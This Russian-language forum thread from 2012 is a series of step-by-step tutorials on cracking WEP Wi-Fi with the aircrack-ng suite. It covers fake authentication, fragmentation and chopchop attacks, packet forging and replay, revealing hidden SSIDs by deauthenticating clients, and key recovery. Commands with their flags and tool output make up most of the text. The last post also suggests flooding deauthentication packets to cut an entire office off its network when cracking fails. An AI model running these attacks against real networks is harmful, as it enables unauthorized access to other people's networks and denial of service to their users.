Взлом Wi-Fi сети (WEP)

levinkv · 29.01.2012, 20:51

Всем привет!

Начинается цикл статей по анализу и взлому wi-fi сетей. Постараюсь по возможности рассказывать, как можно подробно. Останавливаясь на интересных моментах. Если вы по каким то причинам вы не знаете теорию беспроводных сетей, то рекомендую прочитать статью “[Ссылки могут видеть только зарегистрированные пользователи. ]“.

Итак, начну с самого начала, чтобы некоторые вопросы отпали сами собой.

Перевести интерфейс в monitor mode

Для того, чтобы просканировать доступные wi-fi сети, нужно сначала перевести интерфейс wi-fi клиента в режим монитора (monitor mode). Для начала посмотрим, какие беспроводные интерфейсы имеются.

Код:

airmon-ng

[Ссылки могут видеть только зарегистрированные пользователи. ]

У меня доступны два интерфейса: wlan0 и wlan1. wlan0 это обычный и ничем не примечательный wi-fi клиент, который в данной ситуации не нужен. wlan1 – специализированный беспроводной клиент ([Ссылки могут видеть только зарегистрированные пользователи. ]), который как раз нужно перевести в режим монитора. Делается это следующим способом:

Код:

airmon-ng start wlan1

[Ссылки могут видеть только зарегистрированные пользователи. ]

Как видно из листинга, wlan1 создает виртуальный интерфейс mon0, который находится в режиме монитора (monitor mode).

Теперь можем сканировать wi-fi сети. Опять напомню, что выдаются только те AP, в зоне действия которых находимся.

Для справки: можно конечно увеличить область приема. Для этого необходимо приобрести узконаправленную антенну с большим коэффициентом усиления, например от 15 до 20 dbi. В wi-fi клиенте, который использую я, коэффициент усиления антенны составляет 5 dbi. В стандартных wi-fi клиентах и точках доступа (AP) используется ненаправленные антенны (с круговой диаграммой направленности) и коэффициентом усиления от 2 до 3 dbi.

Код:

airodump-ng mon0

[Ссылки могут видеть только зарегистрированные пользователи. ]

Из листинга видим, какие точки доступа находятся в радиусе действия. Но так как закон нарушать очень не хорошо, я буду проводить взлом wi-fi на своей тестовой точке доступа (SSID: hub-lex-AP, канал: 1, MAC-адрес: BC:AE:C5:71:D3:17).

Настройка интерфейса завершена. Теперь займемся непосредственно взломом wi-fi.

Fragmentation attack

Итак, осталось только настроить интерфейс mon0 на конкретную точку доступа (AP). Если этого не сделать, mon0 будет и дальше мониторить все каналы. Следующая команда переводит интерфейс на тестовую wi-fi сеть hub-lex-AP.

Код:

airodump-ng -c 1 -w wep --bssid BC:AE:C5:71:D3:17 mon0

-c – номер канала
-w – название дамп-файла
–bssid – MAC-адрес точки доступа

[Ссылки могут видеть только зарегистрированные пользователи. ]

Первое, что необходимо, это подключиться к точке доступа. Следующая команда ([Ссылки могут видеть только зарегистрированные пользователи. ]) позволяет это сделать.

Код:

aireplay-ng -1 0 -a BC:AE:C5:71:D3:17 -h 00:C0:CA:30:85:7A mon0

-1 – фиктивная аутентификация
0 – реассоциация времени (сек.)
-a – MAC-адрес точки доступа
-h – MAC-адрес клиента, который используем

[Ссылки могут видеть только зарегистрированные пользователи. ]

Аутентификация прошла успешно. В столбце AUTH видна надпись OPN.

[Ссылки могут видеть только зарегистрированные пользователи. ]

Далее будем использовать [Ссылки могут видеть только зарегистрированные пользователи. ]. Fragmentation attack позволяет получить ключевой поток длины 1500 байт, что позволит затем отсылать произвольные пакеты в сеть.

Код:

aireplay-ng -5 -b BC:AE:C5:71:D3:17 -h 00:C0:CA:30:85:7A mon0

-5 – fragmentation attack
-b – MAC-адрес точки доступа
-h – MAC-адрес клиента

[Ссылки могут видеть только зарегистрированные пользователи. ]

Теперь воспользуемся [Ссылки могут видеть только зарегистрированные пользователи. ], чтобы создать шифрованный пакет.

Код:

packetforge-ng -0 -a BC:AE:C5:71:D3:17 -h 00:C0:CA:30:85:7A -k 255.255.255.255 -l 255.255.255.255 -y fragment-1210-103644.xor -w arp

-0 – генерировать ARP-пакет
-a – MAC-адрес точки доступа
-h – MAC-адрес клиента
-k – IP получателя
-l – IP отправителя
-y – чтение PRGA из файла
-w – записать пакет в pcap-файл

[Ссылки могут видеть только зарегистрированные пользователи. ]

Далее используем [Ссылки могут видеть только зарегистрированные пользователи. ] (интерактивная генерация пакетов).

Код:

aireplay-ng -2 -r arp mon0

-2 – interactive replay attack
-r – имя pcap-файла

Осталось подождать пока соберется достаточное количество Data-пакетов.

[Ссылки могут видеть только зарегистрированные пользователи. ]

Data-пакеты собраны. Требуется расшифровать их.

[Ссылки могут видеть только зарегистрированные пользователи. ]

Код:

aircrack-ng -a 1 -0 wep-01.cap

-a – bruto-force атака (1 = WEP, 2 = WPA/WPA2-PSK)
1 – WEP
-0 – использовать цвет

[Ссылки могут видеть только зарегистрированные пользователи. ]

Вот и все. Как видите ничего сложного нет. Если возникнут вопросы, обращайтесь.

Источник: [Ссылки могут видеть только зарегистрированные пользователи. ]

levinkv · 03.02.2012, 18:59 ТС

Всем привет!

В статье “[Ссылки могут видеть только зарегистрированные пользователи. ]” я говорил про возможность взлома wi-fi сети используя [Ссылки могут видеть только зарегистрированные пользователи. ]. Давайте теперь поговорим о [Ссылки могут видеть только зарегистрированные пользователи. ]. Эта атака позволяет расшифровать отдельный пакет, не зная WEP ключа. Но следует знать, что некоторые точки доступа (AP) не подвержены данной атаке. Если вам будет интересно узнать про эту атаку больше, то советую почитать теоретическую часть [Ссылки могут видеть только зарегистрированные пользователи. ].

Итак давайте приступим. Для начала переводим интерфейс в режим монитора (monitor mode) и настраиваемся на конкретную точку доступа. Как это делать было написано в статье “[Ссылки могут видеть только зарегистрированные пользователи. ]“.

После того, как мы настроились на точку доступа (AP), у меня это (SSID: hub-lex-AP, канал: 1, MAC-адрес: BC:AE:C5:71:D3:17), необходимо произвести фиктивную аутентификацию [Ссылки могут видеть только зарегистрированные пользователи. ].

Код:

aireplay-ng -1 0 -a BC:AE:C5:71:D3:17 -h 00:C0:CA:30:85:7A mon0

-1 – фиктивная аутентификация
0 – реассоциация времени (сек.)
-a – MAC-адрес точки доступа
-h – MAC-адрес клиента, который используем

[Ссылки могут видеть только зарегистрированные пользователи. ]

Аутентификация прошла успешно. В столбце AUTH видна надпись OPN.

[Ссылки могут видеть только зарегистрированные пользователи. ]

KoreK chopchop attack

Теперь используем [Ссылки могут видеть только зарегистрированные пользователи. ].

Код:

aireplay-ng -4 -b BC:AE:C5:71:D3:17 -h 00:C0:CA:30:85:7A mon0

-4 – chopchop attack
-b – MAC-адрес точки доступа
-h – MAC-адрес клиента

[Ссылки могут видеть только зарегистрированные пользователи. ]

Вводим “y” и нажимаем Enter для продолжения.

Код:

Offset   83 ( 0% done) | xor = 1A | pt = 73 |  107 frames written in  1823ms
Offset   82 ( 2% done) | xor = 60 | pt = 69 |  253 frames written in  4301ms
Offset   81 ( 4% done) | xor = 4C | pt = F7 |  136 frames written in  2322ms
Offset   80 ( 6% done) | xor = B3 | pt = 06 |   28 frames written in   478ms
Offset   79 ( 8% done) | xor = 8F | pt = 78 |  191 frames written in  3234ms
Offset   78 (10% done) | xor = EE | pt = 05 |  190 frames written in  3229ms
Offset   77 (12% done) | xor = 4A | pt = 04 |  135 frames written in  2296ms
Offset   76 (14% done) | xor = B3 | pt = 02 |   96 frames written in  1631ms
Offset   75 (16% done) | xor = D5 | pt = 00 |  185 frames written in  3145ms
Offset   74 (18% done) | xor = B1 | pt = 00 |   61 frames written in  1037ms
Offset   73 (20% done) | xor = C9 | pt = 9A |   63 frames written in  1071ms
Offset   72 (22% done) | xor = 45 | pt = CD |  121 frames written in  2057ms
Offset   71 (24% done) | xor = A4 | pt = 00 |  234 frames written in  3985ms
Offset   70 (26% done) | xor = D4 | pt = 50 |   60 frames written in  1012ms
Offset   69 (28% done) | xor = A1 | pt = 02 |   69 frames written in  1175ms
Offset   68 (30% done) | xor = 43 | pt = 60 |   51 frames written in   866ms
Offset   67 (32% done) | xor = 80 | pt = 00 |  144 frames written in  2447ms
Offset   66 (34% done) | xor = EE | pt = 00 |  352 frames written in  5985ms
Offset   65 (36% done) | xor = CE | pt = 00 |   92 frames written in  1562ms
Offset   64 (38% done) | xor = 58 | pt = 00 |  231 frames written in  3940ms
Offset   63 (40% done) | xor = FD | pt = 95 |   66 frames written in  1110ms
Offset   62 (42% done) | xor = 78 | pt = 74 |  399 frames written in  6782ms
Offset   61 (44% done) | xor = AA | pt = 00 |  149 frames written in  2534ms
Offset   60 (46% done) | xor = AD | pt = 00 |   35 frames written in   594ms
Offset   59 (48% done) | xor = E3 | pt = 50 |  163 frames written in  2771ms
Offset   58 (50% done) | xor = CC | pt = 00 |   21 frames written in   357ms
Offset   57 (52% done) | xor = 4F | pt = 8C |  251 frames written in  4283ms
Offset   56 (54% done) | xor = C2 | pt = 80 |  134 frames written in  2262ms
Offset   55 (56% done) | xor = A8 | pt = 04 |  236 frames written in  4012ms
Offset   54 (58% done) | xor = C6 | pt = 02 |  132 frames written in  2260ms
Offset   53 (60% done) | xor = 6F | pt = A8 |   17 frames written in   273ms
Offset   52 (62% done) | xor = B2 | pt = C0 |   44 frames written in   755ms
Offset   51 (64% done) | xor = 9B | pt = 01 |   35 frames written in   588ms
Offset   50 (66% done) | xor = C1 | pt = 02 |  155 frames written in  2635ms
Offset   49 (68% done) | xor = A0 | pt = A8 |  188 frames written in  3211ms
Offset   48 (70% done) | xor = F9 | pt = C0 |  174 frames written in  2959ms
Offset   47 (72% done) | xor = B7 | pt = 1E |   22 frames written in   374ms
Offset   46 (74% done) | xor = B0 | pt = 92 |  103 frames written in  1751ms
Offset   45 (76% done) | xor = F6 | pt = 06 |   23 frames written in   389ms
Offset   44 (78% done) | xor = FE | pt = 40 |  112 frames written in  1890ms
Offset   43 (80% done) | xor = 10 | pt = 00 |  106 frames written in  1805ms
Offset   42 (82% done) | xor = 70 | pt = 40 |   38 frames written in   657ms
Offset   41 (84% done) | xor = 06 | pt = 58 |   98 frames written in  1659ms
Offset   40 (86% done) | xor = 8A | pt = 23 |  277 frames written in  4717ms
Offset   39 (88% done) | xor = B0 | pt = 2C |  113 frames written in  1921ms
Offset   38 (90% done) | xor = F7 | pt = 00 |  229 frames written in  3887ms
Offset   37 (92% done) | xor = 58 | pt = 00 |  489 frames written in  8304ms
Offset   36 (94% done) | xor = 6A | pt = 45 |   18 frames written in   321ms
Offset   35 (96% done) | xor = 93 | pt = 00 |  229 frames written in  3891ms
Offset   34 (98% done) | xor = C0 | pt = 08 |  149 frames written in  2520ms

Saving plaintext in replay_dec-1210-104848.cap
Saving keystream in replay_dec-1210-104848.xor

Completed in 15s (3.07 bytes/s)

Атака выполнена успешно и файл “replay_dec-1210-104848.xor” теперь можно использовать с программой [Ссылки могут видеть только зарегистрированные пользователи. ].

Код:

packetforge-ng -0 -a BC:AE:C5:71:D3:17 -h 00:C0:CA:30:85:7A -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-1210-104848.xor -w arp

-0 – генерировать ARP-пакет
-a – MAC-адрес точки доступа
-h – MAC-адрес клиента
-k – IP получателя
-l – IP отправителя
-y – чтение [Ссылки могут видеть только зарегистрированные пользователи. ] из файла
-w – записать пакет в pcap-файл

[Ссылки могут видеть только зарегистрированные пользователи. ]

Далее используем Interactive packet replay (интерактивная генерация пакетов).

Код:

aireplay-ng -2 -r arp mon0

-2 – interactive replay attack
-r – имя pcap-файла

[Ссылки могут видеть только зарегистрированные пользователи. ]

Опять ждем пока соберется необходимое количество Data-пакетов. Когда они будут собраны, начнем их расшифровку воспользовавшись следующей командой.

Код:

aircrack-ng -a 1 -0 wep-01.cap

-a – bruto-force атака (1 = WEP, 2 = WPA/WPA2-PSK)
1 – WEP
-0 – использовать цвет

[Ссылки могут видеть только зарегистрированные пользователи. ]

Вот и все, wi-fi точка взломана. В следующих статьях я вам покажу другие методы взлома wi-fi сети. Если возникнут вопросы, обращайтесь.

Дополнительные материалы:

[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]

levinkv · 03.02.2012, 20:10 ТС

Всем привет!

Цикл статей по анализу и взлому wi-fi сетей продолжается. Сегодня покажу вам еще один метод взлома.

Первое, что делаем переводим интерфейс в режим монитора (monitor mode), как это делается читайте в статье “[Ссылки могут видеть только зарегистрированные пользователи. ]“.

Просматриваем wi-fi сети в радиусе действия.

Код:

# airodump-ng mon0

[Ссылки могут видеть только зарегистрированные пользователи. ]

Теперь настроимся на нашу wi-fi сеть.

Код:

# airodump-ng -c 1 -w wep_0841 --bssid 00:22:B0:BE:75:3D mon0

-c – номер канала
-w – название дамп-файла
–bssid – MAC-адрес точки доступа

Далее производим фиктивную аутентификацию – [Ссылки могут видеть только зарегистрированные пользователи. ].

Код:

# aireplay-ng -1 0 -a 00:22:B0:BE:75:3D -h 00:C0:CA:30:85:7A mon0

-1 – фиктивная аутентификация
0 – реассоциация времени (сек.)
-a – MAC-адрес точки доступа
-h – MAC-адрес клиента, который используем

Код:

14:21:29  Waiting for beacon frame (BSSID: 00:22:B0:BE:75:3D) on channel 1

14:21:29  Sending Authentication Request (Open System) [ACK]
14:21:29  Authentication successful
14:21:29  Sending Association Request

14:21:34  Sending Authentication Request (Open System)

14:21:36  Sending Authentication Request (Open System)

14:21:38  Sending Authentication Request (Open System)

14:21:40  Sending Authentication Request (Open System)

14:21:42  Sending Authentication Request (Open System) [ACK]
14:21:42  Authentication successful
14:21:42  Sending Association Request [ACK]
14:21:42  Association successful :-) (AID: 1)

[Ссылки могут видеть только зарегистрированные пользователи. ]

Аутентификация прошла успешно. В столбце AUTH видна надпись OPN.

Далее используем [Ссылки могут видеть только зарегистрированные пользователи. ] (интерактивная генерация пакетов).

Код:

# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:22:B0:BE:75:3D -h 00:C0:CA:30:85:7A mon0

-2 – interactive replay attack
-p 0841 – устанавливается Frame Control Field пакет, точно такой же, какой wi-fi клиент, в самом начале, отправляет точке доступа (AP)
-c FF:FF:FF:FF:FF:FF – MAC-адрес становится широковещательным (помогает получать новые IV – вектора инициализации)
-b – MAC-адрес точки доступа
-h – MAC-адрес нашего wi-fi клиента

Код:

Read 21 packets...

        Size: 139, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:22:B0:BE:75:3D
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:C0:CA:30:85:7A

        0x0000:  0842 0000 ffff ffff ffff 0022 b0be 753d  .B........."..u=
        0x0010:  00c0 ca30 857a 70ca 67aa 3500 4870 5b18  ...0.zp.g.5.Hp[.
        0x0020:  9494 adae 329f a896 7eb3 e9c1 2db9 b151  ....2...~...-..Q
        0x0030:  7f99 85eb 8d06 b6f6 6bc6 c651 3773 199c  .......k..Q7s..
        0x0040:  f4fe baff a285 5691 d915 8068 f6f0 ea4a  ......V....h...J
        0x0050:  057e 98c0 ae1a 89a7 c06e 5d0e 6538 2d84  .~.......n].e8-.
        0x0060:  7105 5018 799e 56b7 78eb 7b58 9de3 5ca8  q.P.y.V.x.{X..\.
        0x0070:  84bb 084c 4dad 6c1b cf74 987a 9250 3671  ...LM.l..t.z.P6q
        0x0080:  7ae9 4ce7 509f bdbb 6ebb f4              z.L.P...n..

Use this packet ? y

Saving chosen packet in replay_src-1223-142806.cap
You should also start airodump-ng to capture replies.

 351942 packets...(499 pps)

Когда накопится достаточное количество Data-пакетов, производим их расшифровку.

Код:

# aircrack-ng -a 1 -0 wep_0841.cap

-a – bruto-force атака (1 = WEP, 2 = WPA/WPA2-PSK)
1 – WEP
-0 – использовать цвет

[Ссылки могут видеть только зарегистрированные пользователи. ]

Вот и все. Если возникнут вопросы, обращайтесь.

Дополнительные материалы:

[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]

Источник: [Ссылки могут видеть только зарегистрированные пользователи. ]

levinkv · 03.02.2012, 20:20 ТС

Всем привет!

Сегодня покажу вам, как взламывать скрытую wi-fi сеть. Как всегда, ничего сложного в этом нет. Скрытые wi-fi сети, фильтрация по MAC-адресам все это не спасет вас. На мой взгляд, такие методы защиты не эффективны, но это не значит, что ими нужно пренебрегать!

Все что нужно для получения SSID точки доступа, так это клиент подключенный к ней.

Смотрим список wi-fi сетей в радиусе действия.

Код:

# airodump-ng mon0

[Ссылки могут видеть только зарегистрированные пользователи. ]

Красным цветом подчеркнута наша точка доступа (AP), SSID которой скрыт от посторонних. Настраиваемся на нее.

Код:

# airodump-ng -c 1 -w wep_hidden --bssid 00:22:B0:BE:75:3D mon0

-c – номер канала
-w – название дамп-файла
–bssid – MAC-адрес точки доступа

Теперь делаем деаутентификацию клиента. После чего, если взглянуть в окно консоли где работает airodump-ng, то увидим название нашей wi-fi сети.

Для справки: если взломать точку доступа (AP) не получается, с некоторыми AP такое бывает, но черное дело сделать надо. Тогда вместо значения 1 подставляем значение, например 999999. После чего клиент не сможет подключиться к AP, но только до тех пор, пока будет работать эта команда. Следовательно, так можно нарушить работу целого офиса и т.п..

Код:

# aireplay-ng -0 1 -a 00:22:B0:BE:75:3D -c 70:F1:A1:72:B4:25 mon0

-0 – деаутентификация
1 – количество пакетов
-a – MAC-адрес точки доступа
-c – MAC-адрес клиента, к которому применяется деаутентификация

Код:

14:02:32  Waiting for beacon frame (BSSID: 00:22:B0:BE:75:3D) on channel 1
14:02:33  Sending 64 directed DeAuth. STMAC: [70:F1:A1:72:B4:25] [26|26 ACKs]

Деаутентификация прошла успешно. Теперь посмотрим, на работу airodump-ng, как видим wi-fi сеть теперь не скрыта.

[Ссылки могут видеть только зарегистрированные пользователи. ]

Дальше применим вот такой тип атаки.

Код:

# aireplay-ng -3 -b 00:22:B0:BE:75:3D -h 70:F1:A1:72:B4:25 mon0

-3 – arp request replay
-b – MAC-адрес точки доступа
-h – MAC-адрес клиента

Код:

The interface MAC (00:C0:CA:30:85:7A) doesn't match the specified MAC (-h).
        ifconfig mon0 hw ether 70:F1:A1:72:B4:25
14:04:26  Waiting for beacon frame (BSSID: 00:22:B0:BE:75:3D) on channel 1
Saving ARP requests in replay_arp-1223-140426.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
287654 packets (got 50202 ARP requests and 85270 ACKs), sent 146528 packets...(500 pps)

Опять делаем деаутентификацию клиента. После чего полетят Data-пакеты.

Код:

# aireplay-ng -0 1 -a 00:22:B0:BE:75:3D -c 70:F1:A1:72:B4:25 mon0

14:02:32  Waiting for beacon frame (BSSID: 00:22:B0:BE:75:3D) on channel 1
14:02:33  Sending 64 directed DeAuth. STMAC: [70:F1:A1:72:B4:25] [26|26 ACKs]

Когда Data-пакетов накопилось достаточно, можем их расшифровывать.

Код:

# aircrack-ng -a 1 -0 wep_hidden.cap

-a – bruto-force атака (1 = WEP, 2 = WPA/WPA2-PSK)
1 – WEP
-0 – использовать цвет

[Ссылки могут видеть только зарегистрированные пользователи. ]

На сегодня все. Если возникнут вопросы, обращайтесь.

Дополнительные материалы:

[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]